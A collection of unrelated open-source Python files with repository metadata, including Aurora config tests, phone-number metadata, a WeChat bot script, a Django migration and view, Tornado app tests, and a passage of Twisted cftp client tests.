jobs = [HELLO_WORLD]
"""
MESOS_CONFIG_WITH_INCLUDE = """
%s
include(%s)
"""
MESOS_CONFIG_WITH_ANNOUNCE_1 = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': 'announce = Announcer(primary_port="http"),'}
MESOS_CONFIG_WITH_ANNOUNCE_2 = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': '''announce = Announcer(
primary_port = "http",
portmap = {"aurora": "http"}),
'''}
MESOS_CONFIG_WITH_INVALID_STATS = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': 'announce = Announcer(primary_port="http", stats_port="blah"),'}
MESOS_CONFIG_WITHOUT_ANNOUNCE = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{thermos.ports[http]}}',
'announce': ''
}
def test_get_config_announces():
for good_config in (
MESOS_CONFIG_WITH_ANNOUNCE_1,
MESOS_CONFIG_WITH_ANNOUNCE_2,
MESOS_CONFIG_WITHOUT_ANNOUNCE):
bio = BytesIO(good_config)
get_aurora_config('hello_world', bio).job()
def test_get_config_with_broken_subscopes():
bad_config = MESOS_CONFIG_BASE % {
'cmdline': 'echo {{hello[{{thermos.ports[http]}}]}}',
'announce': '',
}
bio = BytesIO(bad_config)
with pytest.raises(AuroraConfig.InvalidConfig) as cm:
get_aurora_config('hello_world', bio).job()
assert 'Unexpected unbound refs' in str(cm.value.message)
def test_get_config_select():
bio = BytesIO(MESOS_CONFIG_WITHOUT_ANNOUNCE)
get_aurora_config(
'hello_world',
bio,
select_env='test',
select_role='john_doe',
select_cluster='test-cluster').job()
bio.seek(0)
with pytest.raises(ValueError) as cm:
get_aurora_config(
'hello_world',
bio,
select_env='staging42',
select_role='moua',
select_cluster='test-cluster').job()
assert 'test-cluster/john_doe/test/hello_world' in str(cm.value.message)
def test_include():
with temporary_dir() as dir:
hello_mesos_fname = "hello_world.mesos"
hello_mesos_path = os.path.join(dir, hello_mesos_fname)
with open(os.path.join(dir, hello_mesos_path), "wb") as hello_world_mesos:
hello_world_mesos.write(MESOS_CONFIG_WITHOUT_ANNOUNCE)
hello_world_mesos.flush()
hello_include_fname_path = os.path.join(dir, "hello_include_fname.mesos")
with open(hello_include_fname_path, "wb+") as hello_include_fname_fp:
hello_include_fname_fp.write(MESOS_CONFIG_WITH_INCLUDE %
("", """'%s'""" % hello_mesos_fname))
hello_include_fname_fp.flush()
get_aurora_config('hello_world', hello_include_fname_path)
hello_include_fname_fp.seek(0)
with pytest.raises(AuroraConfigLoader.InvalidConfigError):
get_aurora_config('hello_world', hello_include_fname_fp)
def test_environment_names():
BAD = ('Prod', ' prod', 'prod ', 'tEst', 'production', 'staging 2', 'stagingA')
GOOD = ('prod', 'devel', 'test', 'staging', 'staging001', 'staging1', 'staging1234')
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
with pytest.raises(ValueError):
config._validate_environment_name(AuroraConfig(base_job))
for env_name in GOOD:
config._validate_environment_name(AuroraConfig(base_job(environment=env_name)))
for env_name in BAD:
with pytest.raises(ValueError):
config._validate_environment_name(AuroraConfig(base_job(environment=env_name)))
def test_dedicated_portmap():
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
config._validate_announce_configuration(AuroraConfig(base_job))
config._validate_announce_configuration(
AuroraConfig(base_job(constraints={'dedicated': 'mesos-team'})))
config._validate_announce_configuration(
AuroraConfig(base_job(constraints={'dedicated': 'mesos-team'},
announce=Announcer(portmap={'http': 80}))))
with pytest.raises(ValueError):
config._validate_announce_configuration(
AuroraConfig(base_job(announce=Announcer(portmap={'http': 80}))))
with pytest.raises(ValueError):
config._validate_announce_configuration(
AuroraConfig(base_job(announce=Announcer(portmap={'http': 80}),
constraints={'foo': 'bar'})))
def test_update_config_passes_with_default_values():
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
config._validate_update_config(AuroraConfig(base_job))
def test_update_config_passes_with_min_requirement_values():
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
update_config=UpdateConfig(watch_secs=26),
health_check_config=HealthCheckConfig(max_consecutive_failures=1),
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
config._validate_update_config(AuroraConfig(base_job))
def test_update_config_fails_insufficient_watch_secs_less_than_target():
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
update_config=UpdateConfig(watch_secs=10),
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
with pytest.raises(SystemExit):
config._validate_update_config(AuroraConfig(base_job))
def test_update_config_fails_insufficient_watch_secs_equal_to_target():
base_job = Job(
name='hello_world', role='john_doe', cluster='test-cluster',
update_config=UpdateConfig(watch_secs=25),
health_check_config=HealthCheckConfig(max_consecutive_failures=1),
task=Task(name='main', processes=[],
resources=Resources(cpu=0.1, ram=64 * MB, disk=64 * MB)))
with pytest.raises(SystemExit):
config._validate_update_config(AuroraConfig(base_job))
| {
"content_hash": "28e134b16ad0428d72c41299a0fc4210",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 86,
"avg_line_length": 33.531400966183575,
"alnum_prop": 0.6622964990635355,
"repo_name": "kidaa/aurora",
"id": "986061bf0829caa0509416a3de1778c2fa40a766",
"size": "7490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/test/python/apache/aurora/client/test_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5916"
},
{
"name": "Groovy",
"bytes": "12868"
},
{
"name": "HTML",
"bytes": "43050"
},
{
"name": "Java",
"bytes": "2603733"
},
{
"name": "JavaScript",
"bytes": "101261"
},
{
"name": "Makefile",
"bytes": "6121"
},
{
"name": "Python",
"bytes": "1447260"
},
{
"name": "Ruby",
"bytes": "4315"
},
{
"name": "Shell",
"bytes": "91263"
},
{
"name": "Smarty",
"bytes": "25233"
},
{
"name": "Thrift",
"bytes": "53782"
}
],
"symlink_target": ""
} |
"""Auto-generated file, do not edit by hand. GG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_GG = PhoneMetadata(id='GG', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{2,5}', possible_length=(3, 4, 5, 6)),
emergency=PhoneNumberDesc(national_number_pattern='112|999', example_number='999', possible_length=(3,)),
short_code=PhoneNumberDesc(national_number_pattern='1(?:0[01]|1(?:[12]|[68]\\d{3})|23|4(?:1|7\\d)|55|800\\d|95)|999', example_number='155', possible_length=(3, 4, 5, 6)),
short_data=True)
| {
"content_hash": "c3db3eb59be03c15084b2c2c61a042e6",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 174,
"avg_line_length": 79.125,
"alnum_prop": 0.7061611374407583,
"repo_name": "samdowd/drumm-farm",
"id": "cfb8f7bd3ce2fd9717e23ffd64162c929033fdb9",
"size": "633",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "drumm_env/lib/python2.7/site-packages/phonenumbers/shortdata/region_GG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "436732"
},
{
"name": "HTML",
"bytes": "578902"
},
{
"name": "JavaScript",
"bytes": "2356286"
},
{
"name": "Python",
"bytes": "33148901"
},
{
"name": "Roff",
"bytes": "28"
},
{
"name": "Shell",
"bytes": "3220"
}
],
"symlink_target": ""
} |
from wxpy import *
bot = Bot()
tuling = Tuling('你的 API KEY (http://www.tuling123.com/)')
my_friend = ensure_one(bot.friends().search('好友的名称'))
@bot.register(my_friend, TEXT)
def tuling_reply(msg):
tuling.do_reply(msg)
bot.start()
| {
"content_hash": "a583a6083d2e42a81f3d0b8d47d3be9d",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 57,
"avg_line_length": 17.142857142857142,
"alnum_prop": 0.6708333333333333,
"repo_name": "xcwstsoftware/wechat",
"id": "dc034eec74de794f93ee86bde752e78e92e7ab91",
"size": "254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "youfouwechat/tuling_reply.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "85632"
}
],
"symlink_target": ""
} |
from south.db import db
from django.db import models
from knesset.tagvotes.models import *
class Migration:
def forwards(self, orm):
# Adding model 'TagVote'
db.create_table('tagvotes_tagvote', (
('id', orm['tagvotes.TagVote:id']),
('tagged_item', orm['tagvotes.TagVote:tagged_item']),
('user', orm['tagvotes.TagVote:user']),
('vote', orm['tagvotes.TagVote:vote']),
))
db.send_create_signal('tagvotes', ['TagVote'])
# Creating unique_together for [tagged_item, user] on TagVote.
db.create_unique('tagvotes_tagvote', ['tagged_item_id', 'user_id'])
def backwards(self, orm):
# Deleting unique_together for [tagged_item, user] on TagVote.
db.delete_unique('tagvotes_tagvote', ['tagged_item_id', 'user_id'])
# Deleting model 'TagVote'
db.delete_table('tagvotes_tagvote')
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'tagging.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)"},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
},
'tagvotes.tagvote': {
'Meta': {'unique_together': "(('tagged_item', 'user'),)"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tagged_item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['tagging.TaggedItem']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tagvotes'", 'to': "orm['auth.User']"}),
'vote': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['tagvotes']
| {
"content_hash": "c11bb9458e9e94e94f5220a78dcc855c",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 142,
"avg_line_length": 59.14772727272727,
"alnum_prop": 0.541402497598463,
"repo_name": "livni/old-OK",
"id": "e0fd14aae0d12f70d67b8577d8a0888b51710fc7",
"size": "5206",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/knesset/tagvotes/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "31938"
},
{
"name": "JavaScript",
"bytes": "84209"
},
{
"name": "Python",
"bytes": "1179397"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
setup(
name='hamr2016',
version='0.1',
description='hackathon',
author_email='all@sonalytic.com',
packages=find_packages(),
)
| {
"content_hash": "534aa522a837356f79dc256da784b2cc",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 43,
"avg_line_length": 23,
"alnum_prop": 0.6231884057971014,
"repo_name": "tillahoffmann/hamr2016",
"id": "4de5510f40a382b770f53c9ceade8aa84a8b5341",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "20099865"
},
{
"name": "Python",
"bytes": "9860"
}
],
"symlink_target": ""
} |
from django.http import HttpResponse
from django.template import loader
# Create your views here.
def index(request):
template = loader.get_template('CareerTinder/photo.html')
context = {
'name': 'John Doe'
}
return HttpResponse(template.render(context, request))
| {
"content_hash": "d3e7918f66357b52baf0b87b2436fbcc",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 61,
"avg_line_length": 26.363636363636363,
"alnum_prop": 0.7103448275862069,
"repo_name": "sarojaerabelli/HVGS",
"id": "213e34cb13068d70e7b5532f5425ba41b997ceed",
"size": "290",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CareerTinderServer/CareerTinder/take_picture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "158564"
},
{
"name": "HTML",
"bytes": "13119"
},
{
"name": "JavaScript",
"bytes": "70224"
},
{
"name": "Python",
"bytes": "32802"
}
],
"symlink_target": ""
} |
from __future__ import print_function
"""
test_app.py -- test pbm.app tornado application
"""
from contextlib import contextmanager
import tornado.testing
from urlobject import URLObject
from pbm.app import make_app
from pbm.app import BaseHandler
@contextmanager
def nop_auth(username="testuser"):
__get_current_user = BaseHandler.get_current_user
def _(*args, **kwargs):
if username is None:
return None
return {'name': username}
try:
BaseHandler.get_current_user = _
yield
finally:
BaseHandler.get_current_user = __get_current_user
class Test_app(tornado.testing.AsyncHTTPTestCase):
def get_app(self):
return make_app()
def test_main_without_nop_auth(self):
resp = self.fetch('/')
self.assertEqual(resp.code, 200)
self.assertEqual(URLObject(resp.effective_url).path, '/login')
with nop_auth(None):
resp = self.fetch('/')
self.assertEqual(resp.code, 200)
self.assertEqual(URLObject(resp.effective_url).path, '/login')
def test_login(self):
resp = self.fetch('/login')
self.assertEqual(resp.code, 200)
self.assertIn('name="_xsrf"', resp.body)
def test_main_as_testuser(self):
with nop_auth():
resp = self.fetch('/')
self.assertEqual(resp.code, 200)
self.assertEqual(URLObject(resp.effective_url).path, '/')
self.assertIn('<a href="/bookmarks/chrome">', resp.body)
# raise Exception((resp, dir(resp)))
def test_bookmarks(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome')
self.assertEqual(resp.code, 200)
self.assertIn('''<div id="jstree">''', resp.body)
def test_bookmarks_json(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome/json')
self.assertEqual(resp.code, 200)
self.assertIn('''bookmark_bar''', resp.body)
import json
data = json.loads(resp.body)
self.assertTrue(data)
self.assertTrue(isinstance(data, dict))
def test_bookmarks_list(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome/list')
self.assertEqual(resp.code, 200)
self.assertIn('''typeof="#BookmarksList"''', resp.body)
def test_bookmarks_links_json(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome/links.json')
self.assertEqual(resp.code, 200)
self.assertIn('''data:text/html, <html style''', resp.body)
import json
data = json.loads(resp.body)
self.assertTrue(data)
self.assertTrue(isinstance(data, list))
def test_bookmarks_tree(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome/tree')
self.assertEqual(resp.code, 200)
self.assertIn('''typeof="pb:BookmarksTree"''', resp.body)
def test_bookmarks_tree_rdfa(self):
with nop_auth():
resp = self.fetch('/bookmarks/chrome/tree')
self.assertEqual(resp.code, 200)
self.assertIn('''typeof="pb:BookmarksTree"''', resp.body)
import rdflib
import rdflib.tools.rdfpipe
import StringIO
input_format = 'rdfa'
graph = rdflib.ConjunctiveGraph()
graph.parse(StringIO.StringIO(resp.body), format=input_format)
self.assertTrue(graph)
for output_format in ['xml', 'n3']: # json-ld
output = graph.serialize(format=output_format)
self.assertTrue(output)
try:
import rdflib_jsonld
rdflib_jsonld
output_format = 'json-ld'
output = graph.serialize(format=output_format, auto_compact=True)
self.assertTrue(output)
except ImportError:
pass
# TODO: skipif
| {
"content_hash": "e940a028c7e7878640b3c0d13e375a98",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 81,
"avg_line_length": 32.75609756097561,
"alnum_prop": 0.5775626706378754,
"repo_name": "westurner/pbm",
"id": "4db30ca4b128eba1a67e7eaa0bd54edb8a29bd4c",
"size": "4075",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_app.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "18970"
},
{
"name": "Makefile",
"bytes": "2757"
},
{
"name": "Python",
"bytes": "93048"
}
],
"symlink_target": ""
} |
import sys, os
try:
import Crypto.Cipher.DES3
except ImportError:
Crypto = None
try:
from twisted.conch import unix
from twisted.conch.scripts import cftp
from twisted.conch.client import connect, default, options
from twisted.conch.test.test_filetransfer import FileTransferForTestAvatar
except ImportError:
unix = None
try:
del sys.modules['twisted.conch.unix'] # remove the bad import
except KeyError:
# In Python 2.4, the bad import has already been cleaned up for us.
pass
from twisted.cred import portal
from twisted.internet import reactor, protocol, interfaces, defer, error
from twisted.internet.utils import getProcessOutputAndValue
from twisted.python import log
from twisted.conch.test import test_ssh, test_conch
from twisted.conch.test.test_filetransfer import SFTPTestBase
from twisted.conch.test.test_filetransfer import FileTransferTestAvatar
class FileTransferTestRealm:
def __init__(self, testDir):
self.testDir = testDir
def requestAvatar(self, avatarID, mind, *interfaces):
a = FileTransferTestAvatar(self.testDir)
return interfaces[0], a, lambda: None
class SFTPTestProcess(protocol.ProcessProtocol):
"""
Protocol for testing cftp. Provides an interface between Python (where all
the tests are) and the cftp client process (which does the work that is
being tested).
"""
def __init__(self, onOutReceived):
"""
@param onOutReceived: A L{Deferred} to be fired as soon as data is
received from stdout.
"""
self.clearBuffer()
self.onOutReceived = onOutReceived
self.onProcessEnd = None
self._expectingCommand = None
self._processEnded = False
def clearBuffer(self):
"""
Clear any buffered data received from stdout. Should be private.
"""
self.buffer = ''
self._linesReceived = []
self._lineBuffer = ''
def outReceived(self, data):
"""
Called by Twisted when the cftp client prints data to stdout.
"""
log.msg('got %s' % data)
lines = (self._lineBuffer + data).split('\n')
self._lineBuffer = lines.pop(-1)
self._linesReceived.extend(lines)
# XXX - not strictly correct.
# We really want onOutReceived to fire after the first 'cftp>' prompt
# has been received. (See use in TestOurServerCmdLineClient.setUp)
if self.onOutReceived is not None:
d, self.onOutReceived = self.onOutReceived, None
d.callback(data)
self.buffer += data
self._checkForCommand()
def _checkForCommand(self):
prompt = 'cftp> '
if self._expectingCommand and self._lineBuffer == prompt:
buf = '\n'.join(self._linesReceived)
if buf.startswith(prompt):
buf = buf[len(prompt):]
self.clearBuffer()
d, self._expectingCommand = self._expectingCommand, None
d.callback(buf)
def errReceived(self, data):
"""
Called by Twisted when the cftp client prints data to stderr.
"""
log.msg('err: %s' % data)
def getBuffer(self):
"""
Return the contents of the buffer of data received from stdout.
"""
return self.buffer
def runCommand(self, command):
"""
Issue the given command via the cftp client. Return a C{Deferred} that
fires when the server returns a result. Note that the C{Deferred} will
callback even if the server returns some kind of error.
@param command: A string containing an sftp command.
@return: A C{Deferred} that fires when the sftp server returns a
result. The payload is the server's response string.
"""
self._expectingCommand = defer.Deferred()
self.clearBuffer()
self.transport.write(command + '\n')
return self._expectingCommand
def runScript(self, commands):
"""
Run each command in sequence and return a Deferred that fires when all
commands are completed.
@param commands: A list of strings containing sftp commands.
@return: A C{Deferred} that fires when all commands are completed. The
payload is a list of response strings from the server, in the same
order as the commands.
"""
sem = defer.DeferredSemaphore(1)
dl = [sem.run(self.runCommand, command) for command in commands]
return defer.gatherResults(dl)
def killProcess(self):
"""
Kill the process if it is still running.
If the process is still running, sends a KILL signal to the transport
and returns a C{Deferred} which fires when L{processEnded} is called.
@return: a C{Deferred}.
"""
if self._processEnded:
return defer.succeed(None)
self.onProcessEnd = defer.Deferred()
self.transport.signalProcess('KILL')
return self.onProcessEnd
def processEnded(self, reason):
"""
Called by Twisted when the cftp client process ends.
"""
self._processEnded = True
if self.onProcessEnd:
d, self.onProcessEnd = self.onProcessEnd, None
d.callback(None)
class CFTPClientTestBase(SFTPTestBase):
def setUp(self):
f = open('dsa_test.pub','w')
f.write(test_ssh.publicDSA_openssh)
f.close()
f = open('dsa_test','w')
f.write(test_ssh.privateDSA_openssh)
f.close()
os.chmod('dsa_test', 33152)
f = open('kh_test','w')
f.write('127.0.0.1 ' + test_ssh.publicRSA_openssh)
f.close()
return SFTPTestBase.setUp(self)
def startServer(self):
realm = FileTransferTestRealm(self.testDir)
p = portal.Portal(realm)
p.registerChecker(test_ssh.ConchTestPublicKeyChecker())
fac = test_ssh.ConchTestServerFactory()
fac.portal = p
self.server = reactor.listenTCP(0, fac, interface="127.0.0.1")
def stopServer(self):
if not hasattr(self.server.factory, 'proto'):
return self._cbStopServer(None)
self.server.factory.proto.expectedLoseConnection = 1
d = defer.maybeDeferred(
self.server.factory.proto.transport.loseConnection)
d.addCallback(self._cbStopServer)
return d
def _cbStopServer(self, ignored):
return defer.maybeDeferred(self.server.stopListening)
def tearDown(self):
for f in ['dsa_test.pub', 'dsa_test', 'kh_test']:
try:
os.remove(f)
except:
pass
return SFTPTestBase.tearDown(self)
class TestOurServerCmdLineClient(CFTPClientTestBase):
def setUp(self):
CFTPClientTestBase.setUp(self)
self.startServer()
cmds = ('-p %i -l testuser '
'--known-hosts kh_test '
'--user-authentications publickey '
'--host-key-algorithms ssh-rsa '
'-K direct '
'-i dsa_test '
'-a --nocache '
'-v '
'127.0.0.1')
port = self.server.getHost().port
cmds = test_conch._makeArgs((cmds % port).split(), mod='cftp')
log.msg('running %s %s' % (sys.executable, cmds))
d = defer.Deferred()
self.processProtocol = SFTPTestProcess(d)
d.addCallback(lambda _: self.processProtocol.clearBuffer())
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
reactor.spawnProcess(self.processProtocol, sys.executable, cmds,
env=env)
return d
def tearDown(self):
d = self.stopServer()
d.addCallback(lambda _: self.processProtocol.killProcess())
return d
def _killProcess(self, ignored):
try:
self.processProtocol.transport.signalProcess('KILL')
except error.ProcessExitedAlready:
pass
def runCommand(self, command):
"""
Run the given command with the cftp client. Return a C{Deferred} that
fires when the command is complete. Payload is the server's output for
that command.
"""
return self.processProtocol.runCommand(command)
def runScript(self, *commands):
"""
Run the given commands with the cftp client. Returns a C{Deferred}
that fires when the commands are all complete. The C{Deferred}'s
payload is a list of output for each command.
"""
return self.processProtocol.runScript(commands)
def testCdPwd(self):
"""
Test that 'pwd' reports the current remote directory, that 'lpwd'
reports the current local directory, and that changing to a
subdirectory then changing to its parent leaves you in the original
remote directory.
"""
# XXX - not actually a unit test, see docstring.
homeDir = os.path.join(os.getcwd(), self.testDir)
d = self.runScript('pwd', 'lpwd', 'cd testDirectory', 'cd ..', 'pwd')
d.addCallback(lambda xs: xs[:3] + xs[4:])
d.addCallback(self.assertEqual,
[homeDir, os.getcwd(), '', homeDir])
return d
def testChAttrs(self):
"""
Check that 'ls -l' output includes the access permissions and that
this output changes appropriately with 'chmod'.
"""
def _check(results):
self.flushLoggedErrors()
self.assertTrue(results[0].startswith('-rw-r--r--'))
self.assertEqual(results[1], '')
self.assertTrue(results[2].startswith('----------'), results[2])
self.assertEqual(results[3], '')
d = self.runScript('ls -l testfile1', 'chmod 0 testfile1',
'ls -l testfile1', 'chmod 644 testfile1')
return d.addCallback(_check)
# XXX test chgrp/own
def testList(self):
"""
Check 'ls' works as expected. Checks for wildcards, hidden files,
listing directories and listing empty directories.
"""
def _check(results):
self.assertEqual(results[0], ['testDirectory', 'testRemoveFile',
'testRenameFile', 'testfile1'])
self.assertEqual(results[1], ['testDirectory', 'testRemoveFile',
'testRenameFile', 'testfile1'])
self.assertEqual(results[2], ['testRemoveFile', 'testRenameFile'])
self.assertEqual(results[3], ['.testHiddenFile', 'testRemoveFile',
'testRenameFile'])
self.assertEqual(results[4], [''])
d = self.runScript('ls', 'ls ../' + os.path.basename(self.testDir),
'ls *File', 'ls -a *File', 'ls -l testDirectory')
d.addCallback(lambda xs: [x.split('\n') for x in xs])
return d.addCallback(_check)
def testHelp(self):
"""
Check that running the '?' command returns help.
"""
d = self.runCommand('?')
d.addCallback(self.assertEqual,
cftp.StdioClient(None).cmd_HELP('').strip())
return d
def assertFilesEqual(self, name1, name2, msg=None):
"""
Assert that the files at C{name1} and C{name2} contain exactly the
same data.
"""
f1 = file(name1).read()
f2 = file(name2).read()
self.failUnlessEqual(f1, f2, msg)
def testGet(self):
"""
Test that 'get' saves the remote file to the correct local location,
that the output of 'get' is correct and that 'rm' actually removes
the file.
"""
# XXX - not actually a unit test
expectedOutput = ("Transferred %s/%s/testfile1 to %s/test file2"
% (os.getcwd(), self.testDir, self.testDir))
def _checkGet(result):
self.assertTrue(result.endswith(expectedOutput))
self.assertFilesEqual(self.testDir + '/testfile1',
self.testDir + '/test file2',
"get failed")
return self.runCommand('rm "test file2"')
d = self.runCommand('get testfile1 "%s/test file2"' % (self.testDir,))
d.addCallback(_checkGet)
d.addCallback(lambda _: self.failIf(
os.path.exists(self.testDir + '/test file2')))
return d
def testWildcardGet(self):
"""
Test that 'get' works correctly when given wildcard parameters.
"""
def _check(ignored):
self.assertFilesEqual(self.testDir + '/testRemoveFile',
'testRemoveFile',
'testRemoveFile get failed')
self.assertFilesEqual(self.testDir + '/testRenameFile',
'testRenameFile',
'testRenameFile get failed')
d = self.runCommand('get testR*')
return d.addCallback(_check)
def testPut(self):
"""
Check that 'put' uploads files correctly and that they can be
successfully removed. Also check the output of the put command.
"""
# XXX - not actually a unit test
expectedOutput = ('Transferred %s/testfile1 to %s/%s/test"file2'
% (self.testDir, os.getcwd(), self.testDir))
def _checkPut(result):
self.assertFilesEqual(self.testDir + '/testfile1',
self.testDir + '/test"file2')
self.failUnless(result.endswith(expectedOutput))
return self.runCommand('rm "test\\"file2"')
d = self.runCommand('put %s/testfile1 "test\\"file2"'
% (self.testDir,))
d.addCallback(_checkPut)
d.addCallback(lambda _: self.failIf(
os.path.exists(self.testDir + '/test"file2')))
return d
def testWildcardPut(self):
"""
What happens if you issue a 'put' command and include a wildcard (i.e.
'*') in parameter? Check that all files matching the wildcard are
uploaded to the correct directory.
"""
def check(results):
self.assertEqual(results[0], '')
self.assertEqual(results[2], '')
self.assertFilesEqual(self.testDir + '/testRemoveFile',
self.testDir + '/../testRemoveFile',
'testRemoveFile get failed')
self.assertFilesEqual(self.testDir + '/testRenameFile',
self.testDir + '/../testRenameFile',
'testRenameFile get failed')
d = self.runScript('cd ..',
'put %s/testR*' % (self.testDir,),
'cd %s' % os.path.basename(self.testDir))
d.addCallback(check)
return d
def testLink(self):
"""
Test that 'ln' creates a file which appears as a link in the output of
'ls'. Check that removing the new file succeeds without output.
"""
def _check(results):
self.flushLoggedErrors()
self.assertEqual(results[0], '')
self.assertTrue(results[1].startswith('l'), 'link failed')
return self.runCommand('rm testLink')
d = self.runScript('ln testLink testfile1', 'ls -l testLink')
d.addCallback(_check)
d.addCallback(self.assertEqual, '')
return d
def testRemoteDirectory(self):
"""
Test that we can create and remove directories with the cftp client.
"""
def _check(results):
self.assertEqual(results[0], '')
self.assertTrue(results[1].startswith('d'))
return self.runCommand('rmdir testMakeDirectory')
d = self.runScript('mkdir testMakeDirectory',
'ls -l testMakeDirector?')
d.addCallback(_check)
d.addCallback(self.assertEqual, '')
return d
def test_existingRemoteDirectory(self):
"""
Test that a C{mkdir} on an existing directory fails with the
appropriate error, and doesn't log an useless error server side.
"""
def _check(results):
self.assertEquals(results[0], '')
self.assertEquals(results[1],
'remote error 11: mkdir failed')
d = self.runScript('mkdir testMakeDirectory',
'mkdir testMakeDirectory')
d.addCallback(_check)
return d
def testLocalDirectory(self):
"""
Test that we can create a directory locally and remove it with the
cftp client. This test works because the 'remote' server is running
out of a local directory.
"""
d = self.runCommand('lmkdir %s/testLocalDirectory' % (self.testDir,))
